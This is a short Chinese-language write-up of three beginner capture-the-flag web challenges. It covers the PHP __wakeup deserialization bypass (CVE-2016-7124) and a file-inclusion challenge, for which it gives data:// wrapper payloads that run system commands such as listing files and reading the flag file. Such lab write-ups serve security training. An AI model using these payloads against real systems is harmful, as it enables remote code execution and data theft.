Web攻防世界引导模式
璐瑶
- 关注
Web攻防世界引导模式
unserial3
反序列化,绕过漏洞
wakeup一旦存在反序列化则代码停止执行,看到这个想到考察我们wakeup漏洞的
因此我们需要根据漏洞(CVE-2016-7124)使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行,达到绕过的目的。
先序列化的到源代码的结果,再改变参数实现绕过
看源代码清楚这是个get传参,直接改写url即可
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a));
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
这个字符串的解释如下:
O
表示这是一个对象。4
是类名xctf
的长度。"xctf"
是类的名称。- 接下来的
1
表示序列化的对象有一个属性。 {s:4:"flag";s:3:"111";}
表示有一个名为flag
的字符串属性,其值为'111'
写的好的仅供参考
Web_php_include
文件包含题目解析
原因:对传入的page参数没有好好过滤导致可以写入危险的php代码以获取信息
看代码:代码作用:过滤掉php://(防止利用这个伪协议进行文件包含漏洞执行,但是对大小写不敏感所以还是可以利用)
data伪协议:
?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
php;伪协议
php://input,用于执行php代码,需要post请求提交数据。
warmup
考察php代码的读取能力
先直接看页面代码通过传参
然后看提示的目录文件访问即可
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 璐瑶 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
攻防世界web引导模式 框架梳理
2024-08-09
SQL注入——SQL注入简单概要
2024-06-22
渗透测试工程师职业要求
2024-06-07
文章目录